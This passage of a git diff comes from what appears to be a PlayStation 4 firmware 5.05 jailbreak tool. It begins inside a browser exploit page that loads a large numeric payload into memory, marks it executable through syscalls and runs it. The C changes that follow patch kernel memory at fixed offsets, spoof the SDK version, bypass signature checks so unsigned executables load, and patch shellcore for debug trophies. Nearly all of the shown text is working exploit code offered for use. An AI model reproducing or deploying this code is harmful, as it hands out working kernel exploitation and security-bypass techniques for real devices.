00840333,2303524926,227363040,1500,2234,4018751488,4294757352,264275455,33925,3012380672,15373991,1222674765,96406925,96075776,1207959552,2783506313,2248146940,1214412224,312587149,2303525011,227363040,1443,442,4018751488,4294738920,1975551487,3012380736,5848189,1222674765,86707597,28966912,1207959552,1642655625,2248146940,1209955776,3191452557,2303524970,227363040,1283,1466,4018751488,4294721512,2089502975,2236096548,1209365759,107623819,1149829120,369036324,1704,203703435,1355055944,1547787611,1581342017,8567235,839892992,1220943887,2169041289,4278190049,3240235007,4200087964,1221691720,1210114497,88655881,30213264,419561347,3991045074,2201469571,1351090687,4157741366,65176530,1351155589,3264548697,2287620232,1346467920,3324120989,3959370179,114596,2649423872,4237158480,3091333119,4294957296,2370357553,4294959125,898451711,1107,369098545,1488,3091290433,20000,2370357553,4294729237,898451711,1097,637534001,1456,0,0,0,0,1162559814,1162559814,1162559814,1162559814,2368127638,2333877865,4285217566,307159087,2126017525,2273089628,2933584231,2873883040,1691277431,2790244714,3433740699,1067714934,1660287673,1236798084,3298746114,1456682778,359572493,2376078599,546479511,2999145027,4090755069,1328063081,1082158946,511720287,2332899422,1482074198,3933198808,373303826,658369985,2539888662,3428137313,150603146,1448475944,90543153,1817695207,191306765,946287949,993956028,4072434858,3527778027,986328841,2905997980,2997993774,1797225581,543330209,913102476,2656328406,631810352,1041404989,4028306957,3765584518,1748606166,2524975579,1097935640,401111112,520125835,1976723478,4074812823,2893352045,2983581974,3504901045,1629464511,1761085531,3167875303,1438605369,807435420,1143492840,710004226,4259009573,2593604998,3824162590,303010469,2790022186,3900690341,442889051,3113996232,1569769770,4140763348,4233779715,299611806,1648222957,1569258689,758230167,1890391491,1520483845,1151087846,4276431736,1758746168,3869512579,2879181562,274696620,74413455,3166285500,4198636983,3021968462,1805395722,3956459435,693256743,1076217921,1833492564,2222424099,614166349,1797979729,2661384232,3390598589,2040429965,3954761818,3656596945,2804584450,2728033973,2820747223,2710338896,2545889169,3250754238,520915981,355807710,2546765881,159329863,3466380265,1489547921,493938806,3863633778,2485270186,3012580038,4025523103,3277033047,3620286691,2030844592,3567818523,2966561409,8217218,3349038936,1706354733,1786250686,1523134857,3243302468,1050541511,1075266081,1103755641,265813185,3802363444,542776256,1378856719,1916044237,856863663,2954898465,2972557510,2963792729,1531714638,1352274015,2038877208,34668325,2835583119,485669431,1158269971,1951774741,69478410,3014334929,4172694730,1915400509,2263102856,138892651,1772820005,4277583645,1952539695,1702047585,3106412,0,0,0,0,0,2,822083584,0,0,65280,0,0,0,0,0,1073741824,805318656,0,1073741824,0,8388608,4294918144,4026531840,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,822083584,0,536871808,65280,0,0,0,0,0,1073741824,1073758208,0,1073741824,2,8388608,4294918144,4026531840,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1399153491,1819043176,1811958101,1701536361,1818586738,1937339231,1919972142,1666383992,1701335909,1866689644,822109554,2425393344,1929440000,1702130553,1970495341,1852141683,1752194916,862286689,1937339136,1601004916,1970496882,1885300077,1702060392,52,0,0,0,0,0,0,38633,2425393152,1701996032,101,0,0,0,0,1495131,7968779,8280595,9728347,1495175,2323579,7968823,9728391,6656,168456997,168430090,1966014474,1952539760,1397763941,1146115380,776295489,5264720,1685091631,795178081,1429492560,1413563472,1431318085,1701719632,1702112884,1459646573,1868786789,1948280173,1397760111,1313163316,775058976,3288625,1801611628,1701737061,1886596716,1811970162,1701536361,1818586738,1650816863,1919972142,1768685688,1919249250,1600939374,779319667,2020765811,1700749056,1919906418,1701016320,1852990795,1867279461,1951622241,1299477089,1819632751,1768685669,1701008226,1667393868,1702129225,1818324594,1919972142,1701642360,1952805741,1835363584,7958627,1769107571,6714478,1937339183,795698548,1835888483,1815047791,1815044713,1666409065,1937331045,1818850389,1919972142,1668481144,1937331045,1818850389,1684956499,1953724755,1867410789,1768319348,1769234787,1767337583,1700030580,29816];for(var i=0;i<payload.length;i++){payloadbuf.backing[i]=payload[i];};p.syscall(74,payloadbuf,65536,7);p.syscall(324,1);p.fcall(createThread,payloadbuf,0,p.sptr("payload"));alert("All done! Have fun with Homebrew!");done();}</script></body></html>
\ No newline at end of file
diff --git a/installer/include/defines.h b/installer/include/defines.h
index 840349e..a9f6261 100644
--- a/installer/include/defines.h
+++ b/installer/include/defines.h
@@ -2,14 +2,14 @@
 #define __DEFINES_H__
 #pragma once
 
-#define VERSION "2.1.1"
+#define VERSION "2.1.2"
 
 //#define DEBUG_SOCKET
 
 #define LOG_IP   "192.168.1.3\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0"
 #define LOG_PORT 9023
 
-#define FAKE_FW_VERSION 0x06700061
+#define FAKE_FW_VERSION 0x07020000
 
 struct filedesc {
 	void *useless1[3];
diff --git a/installer/include/offsets.h b/installer/include/offsets.h
index 784ad20..7540676 100644
--- a/installer/include/offsets.h
+++ b/installer/include/offsets.h
@@ -27,6 +27,9 @@
 #define enable_debug_rifs_patch1		0x064B2B0
 #define enable_debug_rifs_patch2		0x064B2D0
 
+// allow sys_dynlib_dlsym in all processes
+#define sys_dynlib_dlsym_patch			0x0237F3A
+
 // sdk version spoof - enable all VR fws
 #define sdk_version_patch				0x14A63F0
 
diff --git a/installer/source/main.c b/installer/source/main.c
index b938a20..b4f2b56 100644
--- a/installer/source/main.c
+++ b/installer/source/main.c
@@ -72,7 +72,10 @@ int install_payload(struct thread *td, struct install_payload_args* args)
 	*(uint32_t *)(kernel_base + enable_debug_rifs_patch1) = 0x90C301B0;
 	*(uint32_t *)(kernel_base + enable_debug_rifs_patch2) = 0x90C301B0;
 
-	// enable vr 5.05
+	// flatz allow sys_dynlib_dlsym in all processes 5.05
+	*(uint64_t*)(kernel_base + sys_dynlib_dlsym_patch) = 0x8B4890000001C1E9;
+
+	// spoof sdk_version - enable vr 5.05
 	*(uint32_t *)(kernel_base + sdk_version_patch) = FAKE_FW_VERSION;
 
 	// install kpayload
diff --git a/kpayload/include/offsets.h b/kpayload/include/offsets.h
index bd1e6f5..9bfda02 100644
--- a/kpayload/include/offsets.h
+++ b/kpayload/include/offsets.h
@@ -107,4 +107,7 @@
 // enable support with 6.xx external hdd
 #define ext_hdd_patch					0x593C7D
 
+// enable debug trophies on retail
+#define debug_trophies_patch			0x6ABE39
+
 #endif
diff --git a/kpayload/source/fpkg.c b/kpayload/source/fpkg.c
index 789bd20..76645af 100644
--- a/kpayload/source/fpkg.c
+++ b/kpayload/source/fpkg.c
@@ -17,7 +17,6 @@ extern int (*fpu_kern_enter)(struct thread *td, struct fpu_kern_ctx *ctx, uint32
 extern int (*fpu_kern_leave)(struct thread *td, struct fpu_kern_ctx *ctx) PAYLOAD_BSS;
 extern void* (*memcpy)(void* dst, const void* src, size_t len) PAYLOAD_BSS;
 extern void* (*memset)(void *s, int c, size_t n) PAYLOAD_BSS;
-extern int (*printf)(const char *fmt, ...) PAYLOAD_BSS;
 
 extern struct sbl_map_list_entry** SBL_DRIVER_MAPPED_PAGES PAYLOAD_BSS;
 extern struct sx* SBL_PFS_SX PAYLOAD_BSS;
diff --git a/kpayload/source/fself.c b/kpayload/source/fself.c
index 6507859..578b56b 100644
--- a/kpayload/source/fself.c
+++ b/kpayload/source/fself.c
@@ -286,7 +286,10 @@ PAYLOAD_CODE int my_sceSblAuthMgrVerifyHeader(struct self_context* ctx)
 
 PAYLOAD_CODE int my_sceSblAuthMgrSmLoadSelfSegment__sceSblServiceMailbox(unsigned long service_id, uint8_t* request, void* response)
 {
-	register struct self_context* ctx __asm ("r14"); // 5.05
+	// self_context is first param of caller. 0x08 = sizeof(struct self_context*)
+	uint8_t* frame = (uint8_t*)__builtin_frame_address(1);
+	struct self_context* ctx = *(struct self_context**)(frame - 0x08);
+
 	int is_unsigned = ctx && is_fake_self(ctx);
 
 	if (is_unsigned) {
@@ -298,8 +301,10 @@ PAYLOAD_CODE int my_sceSblAuthMgrSmLoadSelfSegment__sceSblServiceMailbox(unsigne
 
 PAYLOAD_CODE int my_sceSblAuthMgrSmLoadSelfBlock__sceSblServiceMailbox(unsigned long service_id, uint8_t* request, void* response)
 {
+	// self_context is first param of caller. 0x08 = sizeof(struct self_context*)
 	uint8_t* frame = (uint8_t*)__builtin_frame_address(1);
-	struct self_context* ctx = *(struct self_context**)(frame - 0x1C8); // 5.05
+	struct self_context* ctx = *(struct self_context**)(frame - 0x08);
+
 	vm_offset_t segment_data_gpu_va = *(unsigned long*)(request + 0x08);
 	vm_offset_t cur_data_gpu_va = *(unsigned long*)(request + 0x50);
 	vm_offset_t cur_data2_gpu_va = *(unsigned long*)(request + 0x58);
@@ -323,7 +328,10 @@ PAYLOAD_CODE int my_sceSblAuthMgrSmLoadSelfBlock__sceSblServiceMailbox(unsigned
 				/* data spans two consecutive memory's pages, so we need to copy twice */
 				size1 = PAGE_SIZE - data_offset;
 				memcpy((char*)segment_data_cpu_va, (char*)cur_data_cpu_va + data_offset, size1);
-				memcpy((char*)segment_data_cpu_va + size1, (char*)cur_data2_cpu_va, data_size - size1);
+
+				// thanks to kiwidog & Al-Azif
+				if (cur_data2_cpu_va)
+					memcpy((char*)segment_data_cpu_va + size1, (char*)cur_data2_cpu_va, data_size - size1);
 			} else {
 				memcpy((char*)segment_data_cpu_va, (char*)cur_data_cpu_va + data_offset, data_size);
 			}
diff --git a/kpayload/source/patch.c b/kpayload/source/patch.c
index e5ec3d9..8e357a9 100644
--- a/kpayload/source/patch.c
+++ b/kpayload/source/patch.c
@@ -231,6 +231,12 @@ PAYLOAD_CODE int shellcore_fpkg_patch(void)
 	if (ret)
 		goto error;
 
+	// enable debug trophies on retail
+	ret = proc_write_mem(ssc, (void *)(text_seg_base + debug_trophies_patch), 5, "\x31\xc0\x90\x90\x90", &n);
+	if (ret)
+	{
+		goto error;
+	}
 
 error:
 	if (entries)